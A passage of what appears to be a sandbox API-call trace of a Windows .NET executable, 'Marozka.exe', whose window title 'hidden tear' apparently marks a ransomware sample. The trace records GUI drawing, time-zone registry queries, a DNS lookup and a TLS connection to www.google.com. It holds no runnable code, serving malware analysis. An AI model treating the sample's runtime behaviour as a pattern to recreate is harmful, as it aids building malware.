out: lpRect=0x5bde18) returned 1 [0063.576] GetWindowTextLengthW (hWnd=0x70030) returned 11 [0063.576] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0063.577] GetSystemMetrics (nIndex=42) returned 0 [0063.577] GetWindowTextW (in: hWnd=0x70030, lpString=0x5bdcd8, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0063.577] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xd, wParam=0xc, lParam=0x5bdcd8) returned 0xb [0063.577] GetClientRect (in: hWnd=0x70030, lpRect=0x5bdd20 | out: lpRect=0x5bdd20) returned 1 [0063.577] GetCurrentObject (hdc=0x10105d6, type=0x1) returned 0xb00017 [0063.577] GetCurrentObject (hdc=0x10105d6, type=0x2) returned 0x900010 [0063.577] GetCurrentObject (hdc=0x10105d6, type=0x7) returned 0xc05072a [0063.577] GetCurrentObject (hdc=0x10105d6, type=0x6) returned 0x8a01c2 [0063.577] SaveDC (hdc=0x10105d6) returned 1 [0063.577] GetNearestColor (hdc=0x10105d6, color=0xf0f0f0) returned 0xf0f0f0 [0063.577] CreateSolidBrush (color=0xf0f0f0) returned 0x2410019f [0063.577] FillRect (hDC=0x10105d6, lprc=0x5bdbc0, hbr=0x2410019f) returned 1 [0063.577] DeleteObject (ho=0x2410019f) returned 1 [0063.577] RestoreDC (hdc=0x10105d6, nSavedDC=-1) returned 1 [0063.578] GdipCreateHalftonePalette () returned 0x5a08062b [0063.578] SelectPalette (hdc=0x10105d6, hPal=0x5a08062b, bForceBkgd=1) returned 0x88000b [0063.578] GetWindowTextLengthW (hWnd=0x70030) returned 11 [0063.578] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0063.578] GetSystemMetrics (nIndex=42) returned 0 [0063.578] GetWindowTextW (in: hWnd=0x70030, lpString=0x5be120, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0063.579] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xd, wParam=0xc, lParam=0x5be120) returned 0xb [0063.579] SelectPalette (hdc=0x10105d6, hPal=0x88000b, bForceBkgd=0) returned 0x5a08062b [0063.579] EndPaint (hWnd=0x70030, lpPaint=0x5be18c) returned 1 [0063.579] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5bea0c*=0x484, lpdwindex=0x5be82c | out: lpdwindex=0x5be82c) returned 0x80010115 [0063.580] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5bea0c*=0x48c, lpdwindex=0x5be82c | out: lpdwindex=0x5be82c) returned 0x80010115 [0063.580] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5bea60*=0x4b4, lpdwindex=0x5be87c | out: lpdwindex=0x5be87c) returned 0x80010115 [0063.580] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5bea60*=0x4bc, lpdwindex=0x5be87c | out: lpdwindex=0x5be87c) returned 0x80010115 [0063.581] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5bea60*=0x4c4, lpdwindex=0x5be87c | out: lpdwindex=0x5be87c) returned 0x80010115 [0063.582] WinHttpGetProxyForUrl (in: hSession=0xb055e8, lpcwszUrl="https://www.google.com/", pAutoProxyOptions=0x5be9f8, pProxyInfo=0x5bea68 | out: pProxyInfo=0x5bea68) returned 0 [0063.614] GetCurrentProcess () returned 0xffffffff [0063.614] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5be79c | out: TokenHandle=0x5be79c*=0x57c) returned 1 [0063.615] GetCurrentProcess () returned 0xffffffff [0063.615] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5be7ac | out: TokenHandle=0x5be7ac*=0x580) returned 1 [0063.617] GetTimeZoneInformation (in: lpTimeZoneInformation=0x5be91c | out: lpTimeZoneInformation=0x5be91c) returned 0x1 [0063.618] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x5be778 | out: pTimeZoneInformation=0x5be778) returned 0x1 [0063.620] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x5be85c | out: phkResult=0x5be85c*=0x584) returned 0x0 [0063.621] RegQueryValueExW (in: hKey=0x584, lpValueName="TZI", lpReserved=0x0, lpType=0x5be878, lpData=0x0, lpcbData=0x5be874*=0x0 | out: lpType=0x5be878*=0x3, lpData=0x0, lpcbData=0x5be874*=0x2c) returned 0x0 [0063.621] RegQueryValueExW (in: hKey=0x584, lpValueName="TZI", lpReserved=0x0, lpType=0x5be878, lpData=0x280e658, lpcbData=0x5be874*=0x2c | out: lpType=0x5be878*=0x3, lpData=0x280e658*, lpcbData=0x5be874*=0x2c) returned 0x0 [0063.622] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x5be6b0 | out: phkResult=0x5be6b0*=0x0) returned 0x2 [0063.623] RegQueryValueExW (in: hKey=0x584, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x5be850, lpData=0x0, lpcbData=0x5be84c*=0x0 | out: lpType=0x5be850*=0x1, lpData=0x0, lpcbData=0x5be84c*=0x20) returned 0x0 [0063.623] RegQueryValueExW (in: hKey=0x584, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x5be850, lpData=0x280ea7c, lpcbData=0x5be84c*=0x20 | out: lpType=0x5be850*=0x1, lpData="@tzres.dll,-320", lpcbData=0x5be84c*=0x20) returned 0x0 [0063.623] RegQueryValueExW (in: hKey=0x584, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x5be850, lpData=0x0, lpcbData=0x5be84c*=0x0 | out: lpType=0x5be850*=0x1, lpData=0x0, lpcbData=0x5be84c*=0x20) returned 0x0 [0063.623] RegQueryValueExW (in: hKey=0x584, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x5be850, lpData=0x280ead4, lpcbData=0x5be84c*=0x20 | out: lpType=0x5be850*=0x1, lpData="@tzres.dll,-322", lpcbData=0x5be84c*=0x20) returned 0x0 [0063.623] RegQueryValueExW (in: hKey=0x584, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x5be850, lpData=0x0, lpcbData=0x5be84c*=0x0 | out: lpType=0x5be850*=0x1, lpData=0x0, lpcbData=0x5be84c*=0x20) returned 0x0 [0063.623] RegQueryValueExW (in: hKey=0x584, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x5be850, lpData=0x280eb2c, lpcbData=0x5be84c*=0x20 | out: lpType=0x5be850*=0x1, lpData="@tzres.dll,-321", lpcbData=0x5be84c*=0x20) returned 0x0 [0063.630] CoTaskMemAlloc (cb=0x20c) returned 0xb0f568 [0063.630] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xb0f568 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0063.631] CoTaskMemFree (pv=0xb0f568) [0063.631] CoTaskMemAlloc (cb=0x20e) returned 0xb0f568 [0063.631] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x5be86c, pwszFileMUIPath=0xb0f568, pcchFileMUIPath=0x5be870, pululEnumerator=0x5be864 | out: pwszLanguage=0x0, pcchLanguage=0x5be86c, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x5be870, pululEnumerator=0x5be864) returned 1 [0063.643] CoTaskMemFree (pv=0x0) [0063.643] CoTaskMemFree (pv=0xb0f568) [0063.643] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x8240001 [0063.656] CoTaskMemAlloc (cb=0x3ec) returned 0xb0f3a8 [0063.656] LoadStringW (in: hInstance=0x8240001, uID=0x140, lpBuffer=0xb0f3a8, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0063.656] CoTaskMemFree (pv=0xb0f3a8) [0063.656] FreeLibrary (hLibModule=0x8240001) returned 1 [0063.657] CoTaskMemAlloc (cb=0x20c) returned 0xb10760 [0063.657] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xb10760 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0063.657] CoTaskMemFree (pv=0xb10760) [0063.657] CoTaskMemAlloc (cb=0x20e) returned 0xb10760 [0063.657] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x5be86c, pwszFileMUIPath=0xb10760, pcchFileMUIPath=0x5be870, pululEnumerator=0x5be864 | out: pwszLanguage=0x0, pcchLanguage=0x5be86c, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x5be870, pululEnumerator=0x5be864) returned 1 [0063.658] CoTaskMemFree (pv=0x0) [0063.658] CoTaskMemFree (pv=0xb10760) [0063.658] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x8240001 [0063.659] CoTaskMemAlloc (cb=0x3ec) returned 0xb0f3a8 [0063.660] LoadStringW (in: hInstance=0x8240001, uID=0x142, lpBuffer=0xb0f3a8, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0063.660] CoTaskMemFree (pv=0xb0f3a8) [0063.660] FreeLibrary (hLibModule=0x8240001) returned 1 [0063.660] CoTaskMemAlloc (cb=0x20c) returned 0xb10760 [0063.660] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xb10760 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0063.661] CoTaskMemFree (pv=0xb10760) [0063.661] CoTaskMemAlloc (cb=0x20e) returned 0xb10760 [0063.661] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x5be86c, pwszFileMUIPath=0xb10760, pcchFileMUIPath=0x5be870, pululEnumerator=0x5be864 | out: pwszLanguage=0x0, pcchLanguage=0x5be86c, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x5be870, pululEnumerator=0x5be864) returned 1 [0063.662] CoTaskMemFree (pv=0x0) [0063.662] CoTaskMemFree (pv=0xb10760) [0063.662] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x8240001 [0063.663] CoTaskMemAlloc (cb=0x3ec) returned 0xb0f3a8 [0063.663] LoadStringW (in: hInstance=0x8240001, uID=0x141, lpBuffer=0xb0f3a8, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0063.663] CoTaskMemFree (pv=0xb0f3a8) [0063.663] FreeLibrary (hLibModule=0x8240001) returned 1 [0063.664] RegCloseKey (hKey=0x584) returned 0x0 [0063.664] SetEvent (hEvent=0x2d4) returned 1 [0063.673] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x5bea78 | out: pFixedInfo=0x0, pOutBufLen=0x5bea78) returned 0x6f [0064.164] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0xb10760 [0064.164] GetNetworkParams (in: pFixedInfo=0xb10760, pOutBufLen=0x5bea78 | out: pFixedInfo=0xb10760, pOutBufLen=0x5bea78) returned 0x0 [0064.439] LocalFree (hMem=0xb10760) returned 0x0 [0064.440] CoTaskMemAlloc (cb=0x20e) returned 0xb10760 [0064.440] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0xb10760, nSize=0x105 | out: lpBuffer="\xb890\x77d\xb4f8\xb0") returned 0x0 [0064.440] CoTaskMemFree (pv=0xb10760) [0064.440] CoTaskMemAlloc (cb=0x20e) returned 0xb10760 [0064.440] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0xb10760, nSize=0x105 | out: lpBuffer="\xb890\x77d\xb4f8\xb0") returned 0x0 [0064.440] CoTaskMemFree (pv=0xb10760) [0064.443] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5b0 [0064.444] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x55c [0064.445] GetAddrInfoW (in: pNodeName="www.google.com", pServiceName=0x0, pHints=0x5be960*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5be908 | out: ppResult=0x5be908*=0xab6c50*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="www.google.com", ai_addr=0xa64b68*(sa_family=2, sin_port=0x0, sin_addr="172.217.22.100"), ai_next=0x0)) returned 0 [0064.706] FreeAddrInfoW (pAddrInfo=0xab6c50*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="www.google.com", ai_addr=0xa64b68*(sa_family=2, sin_port=0x0, sin_addr="172.217.22.100"), ai_next=0x0)) [0064.715] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5b8 [0064.715] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5c0 [0064.715] ioctlsocket (in: s=0x5b8, cmd=-2147195266, argp=0x5be934 | out: argp=0x5be934) returned 0 [0064.715] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5c4 [0064.716] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5c8 [0064.716] ioctlsocket (in: s=0x5c4, cmd=-2147195266, argp=0x5be934 | out: argp=0x5be934) returned 0 [0064.716] WSAIoctl (in: s=0x5b8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5be91c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5be91c, lpOverlapped=0x0) returned -1 [0064.716] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x5be64c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0064.716] WSAEventSelect (s=0x5b8, hEventObject=0x5c0, lNetworkEvents=512) returned 0 [0064.716] WSAIoctl (in: s=0x5c4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5be91c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5be91c, lpOverlapped=0x0) returned -1 [0064.716] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x5be64c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0064.716] WSAEventSelect (s=0x5c4, hEventObject=0x5c8, lNetworkEvents=512) returned 0 [0064.716] GetAdaptersAddresses () returned 0x6f [0064.724] LocalAlloc (uFlags=0x0, uBytes=0x810) returned 0x77ddb18 [0064.725] GetAdaptersAddresses () returned 0x0 [0064.735] LocalFree (hMem=0x77ddb18) returned 0x0 [0064.741] WSAConnect (in: s=0x5b0, name=0x281a4ec*(sa_family=2, sin_port=0x1bb, sin_addr="172.217.22.100"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0064.761] closesocket (s=0x55c) returned 0 [0064.786] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x5be868 | out: phkResult=0x5be868*=0x55c) returned 0x0 [0064.787] RegQueryValueExW (in: hKey=0x55c, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x5be884, lpData=0x0, lpcbData=0x5be880*=0x0 | out: lpType=0x5be884*=0x0, lpData=0x0, lpcbData=0x5be880*=0x0) returned 0x2 [0064.787] RegCloseKey (hKey=0x55c) returned 0x0 [0064.796] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x5be86c | out: phkResult=0x5be86c*=0x55c) returned 0x0 [0064.797] RegQueryValueExW (in: hKey=0x55c, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x5be888, lpData=0x0, lpcbData=0x5be884*=0x0 | out: lpType=0x5be888*=0x0, lpData=0x0, lpcbData=0x5be884*=0x0) returned 0x2 [0064.797] RegCloseKey (hKey=0x55c) returned 0x0 [0064.799] GetCurrentProcessId () returned 0xd20 [0064.801] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd20) returned 0x55c [0064.864] EnumProcessModules (in: hProcess=0x55c, lphModule=0x281cc18, cb=0x100, lpcbNeeded=0x5be874 | out: lphModule=0x281cc18, lpcbNeeded=0x5be874) returned 1 [0064.864] EnumProcessModules (in: hProcess=0x55c, lphModule=0x281cd24, cb=0x200, lpcbNeeded=0x5be874 | out: lphModule=0x281cd24, lpcbNeeded=0x5be874) returned 1 [0064.865] GetModuleInformation (in: hProcess=0x55c, hModule=0x3f0000, lpmodinfo=0x281cf64, cb=0xc | out: lpmodinfo=0x281cf64*(lpBaseOfDll=0x3f0000, SizeOfImage=0x3a000, EntryPoint=0x0)) returned 1 [0064.865] CoTaskMemAlloc (cb=0x804) returned 0x77ddb18 [0064.865] GetModuleBaseNameW (in: hProcess=0x55c, hModule=0x3f0000, lpBaseName=0x77ddb18, nSize=0x800 | out: lpBaseName="Marozka.exe") returned 0xb [0064.866] CoTaskMemFree (pv=0x77ddb18) [0064.866] CoTaskMemAlloc (cb=0x804) returned 0x77ddb18 [0064.866] GetModuleFileNameExW (in: hProcess=0x55c, hModule=0x3f0000, lpFilename=0x77ddb18, nSize=0x800 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\marozka.exe")) returned 0x23 [0064.866] CoTaskMemFree (pv=0x77ddb18) [0064.866] CloseHandle (hObject=0x55c) returned 1 [0064.876] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", nBufferLength=0x105, lpBuffer=0x5be370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", lpFilePart=0x0) returned 0x23 [0064.877] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SchSendAuxRecord", ulOptions=0x0, samDesired=0x20019, phkResult=0x5be86c | out: phkResult=0x5be86c*=0x0) returned 0x2 [0064.878] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x5be86c | out: phkResult=0x5be86c*=0x55c) returned 0x0 [0064.878] RegQueryValueExW (in: hKey=0x55c, lpValueName="SchSendAuxRecord", lpReserved=0x0, lpType=0x5be888, lpData=0x0, lpcbData=0x5be884*=0x0 | out: lpType=0x5be888*=0x0, lpData=0x0, lpcbData=0x5be884*=0x0) returned 0x2 [0064.879] RegCloseKey (hKey=0x55c) returned 0x0 [0064.879] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x5be86c | out: phkResult=0x5be86c*=0x55c) returned 0x0 [0064.880] RegQueryValueExW (in: hKey=0x55c, lpValueName="SystemDefaultTlsVersions", lpReserved=0x0, lpType=0x5be888, lpData=0x0, lpcbData=0x5be884*=0x0 | out: lpType=0x5be888*=0x0, lpData=0x0, lpcbData=0x5be884*=0x0) returned 0x2 [0064.880] RegCloseKey (hKey=0x55c) returned 0x0 [0064.883] GetCurrentProcessId () returned 0xd20 [0064.883] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd20) returned 0x55c [0064.883] EnumProcessModules (in: hProcess=0x55c, lphModule=0x281fbd0, cb=0x100, lpcbNeeded=0x5be86c | out: lphModule=0x281fbd0, lpcbNeeded=0x5be86c) returned 1 [0064.883] EnumProcessModules (in: hProcess=0x55c, lphModule=0x281fcdc, cb=0x200, lpcbNeeded=0x5be86c | out: lphModule=0x281fcdc, lpcbNeeded=0x5be86c) returned 1 [0064.883] GetModuleInformation (in: hProcess=0x55c, hModule=0x3f0000, lpmodinfo=0x281ff1c, cb=0xc | out: lpmodinfo=0x281ff1c*(lpBaseOfDll=0x3f0000, SizeOfImage=0x3a000, EntryPoint=0x0)) returned 1 [0064.884] CoTaskMemAlloc (cb=0x804) returned 0x77ddb18 [0064.884] GetModuleBaseNameW (in: hProcess=0x55c, hModule=0x3f0000, lpBaseName=0x77ddb18, nSize=0x800 | out: lpBaseName="Marozka.exe") returned 0xb [0064.884] CoTaskMemFree (pv=0x77ddb18) [0064.884] CoTaskMemAlloc (cb=0x804) returned 0x77ddb18 [0064.884] GetModuleFileNameExW (in: hProcess=0x55c, hModule=0x3f0000, lpFilename=0x77ddb18, nSize=0x800 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\marozka.exe")) returned 0x23 [0064.884] CoTaskMemFree (pv=0x77ddb18) [0064.884] CloseHandle (hObject=0x55c) returned 1 [0064.884] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", nBufferLength=0x105, lpBuffer=0x5be368, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", lpFilePart=0x0) returned 0x23 [0064.884] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.RequireCertificateEKUs", ulOptions=0x0, samDesired=0x20019, phkResult=0x5be864 | out: phkResult=0x5be864*=0x0) returned 0x2 [0064.885] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x5be864 | out: phkResult=0x5be864*=0x55c) returned 0x0 [0064.885] RegQueryValueExW (in: hKey=0x55c, lpValueName="RequireCertificateEKUs", lpReserved=0x0, lpType=0x5be880, lpData=0x0, lpcbData=0x5be87c*=0x0 | out: lpType=0x5be880*=0x0, lpData=0x0, lpcbData=0x5be87c*=0x0) returned 0x2 [0064.885] RegCloseKey (hKey=0x55c) returned 0x0 [0064.900] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0xa8ec28 [0065.352] CryptFindOIDInfo (dwKeyType=0x2, pvKey=0xa8ec28, dwGroupId=0x0) returned 0x0 [0065.384] LocalFree (hMem=0xa8ec28) returned 0x0 [0065.384] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x77de148 [0065.384] CryptFindOIDInfo (dwKeyType=0x2, pvKey=0x77de148, dwGroupId=0x0) returned 0x0 [0065.385] LocalFree (hMem=0x77de148) returned 0x0 [0065.525] EnumerateSecurityPackagesW (in: pcPackages=0x5be8a8, ppPackageInfo=0x5be83c | out: pcPackages=0x5be8a8, ppPackageInfo=0x5be83c) returned 0x0 [0065.536] FreeContextBuffer (in: pvContextBuffer=0x77e7d80 | out: pvContextBuffer=0x77e7d80) returned 0x0 [0065.540] GetCurrentProcess () returned 0xffffffff [0065.540] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5be66c | out: TokenHandle=0x5be66c*=0x5d0) returned 1 [0065.541] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x28225c4, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x5be6c0, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x2823d70, ptsExpiry=0x5be644 | out: phCredential=0x2823d70, ptsExpiry=0x5be644) returned 0x0 [0065.834] InitializeSecurityContextW (in: phCredential=0x5be680, phContext=0x0, pTargetName=0x281a5e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x2823f74, pOutput=0x2823f0c, pfContextAttr=0x2822598, ptsExpiry=0x5be678 | out: phNewContext=0x2823f74, pOutput=0x2823f0c, pfContextAttr=0x2822598, ptsExpiry=0x5be678) returned 0x90312 [0065.836] FreeContextBuffer (in: pvContextBuffer=0x77ced98 | out: pvContextBuffer=0x77ced98) returned 0x0 [0065.839] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0065.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="AppPolicyGetClrCompat", cchWideChar=21, lpMultiByteStr=0x5be6c0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppPolicyGetClrCompatã\x06r\x8f…¼\x99ðùÔs\x08î[", lpUsedDefaultChar=0x0) returned 21 [0065.840] GetProcAddress (hModule=0x75e90000, lpProcName="AppPolicyGetClrCompat") returned 0x74f768b0 [0065.845] AppPolicyGetClrCompat () returned 0x0 [0065.846] send (s=0x5b0, buf=0x2823f88*, len=122, flags=0) returned 122 [0065.850] recv (in: s=0x5b0, buf=0x2823f88, len=5, flags=0 | out: buf=0x2823f88*) returned 5 [0065.878] recv (in: s=0x5b0, buf=0x2823f8d, len=63, flags=0 | out: buf=0x2823f8d*) returned 63 [0065.879] InitializeSecurityContextW (in: phCredential=0x5be5d8, phContext=0x5be668, pTargetName=0x281a5e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2824360, Reserved2=0x0, phNewContext=0x2823f74, pOutput=0x2824374, pfContextAttr=0x2822598, ptsExpiry=0x5be5d0 | out: phNewContext=0x2823f74, pOutput=0x2824374, pfContextAttr=0x2822598, ptsExpiry=0x5be5d0) returned 0x90312 [0065.880] recv (in: s=0x5b0, buf=0x2824404, len=5, flags=0 | out: buf=0x2824404*) returned 5 [0065.880] recv (in: s=0x5b0, buf=0x282441d, len=2112, flags=0 | out: buf=0x282441d*) returned 2112 [0065.880] InitializeSecurityContextW (in: phCredential=0x5be534, phContext=0x5be5c4, pTargetName=0x281a5e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2824cd0, Reserved2=0x0, phNewContext=0x2823f74, pOutput=0x2824ce4, pfContextAttr=0x2822598, ptsExpiry=0x5be52c | out: phNewContext=0x2823f74, pOutput=0x2824ce4, pfContextAttr=0x2822598, ptsExpiry=0x5be52c) returned 0x90312 [0065.913] recv (in: s=0x5b0, buf=0x2824d74, len=5, flags=0 | out: buf=0x2824d74*) returned 5 [0065.913] recv (in: s=0x5b0, buf=0x2824d8d, len=114, flags=0 | out: buf=0x2824d8d*) returned 114 [0065.913] InitializeSecurityContextW (in: phCredential=0x5be490, phContext=0x5be520, pTargetName=0x281a5e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2824e70, Reserved2=0x0, phNewContext=0x2823f74, pOutput=0x2824e84, pfContextAttr=0x2822598, ptsExpiry=0x5be488 | out: phNewContext=0x2823f74, pOutput=0x2824e84, pfContextAttr=0x2822598, ptsExpiry=0x5be488) returned 0x90312 [0065.913] recv (in: s=0x5b0, buf=0x2824f14, len=5, flags=0 | out: buf=0x2824f14*) returned 5 [0065.913] recv (in: s=0x5b0, buf=0x2824f2d, len=4, flags=0 | out: buf=0x2824f2d*) returned 4 [0065.913] InitializeSecurityContextW (in: phCredential=0x5be3ec, phContext=0x5be47c, pTargetName=0x281a5e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2824fa4, Reserved2=0x0, phNewContext=0x2823f74, pOutput=0x2824fb8, pfContextAttr=0x2822598, ptsExpiry=0x5be3e4 | out: phNewContext=0x2823f74, pOutput=0x2824fb8, pfContextAttr=0x2822598, ptsExpiry=0x5be3e4) returned 0x90312 [0065.943] FreeContextBuffer (in: pvContextBuffer=0xa936b0 | out: pvContextBuffer=0xa936b0) returned 0x0 [0065.944] send (s=0x5b0, buf=0x2825034*, len=101, flags=0) returned 101 [0065.944] recv (in: 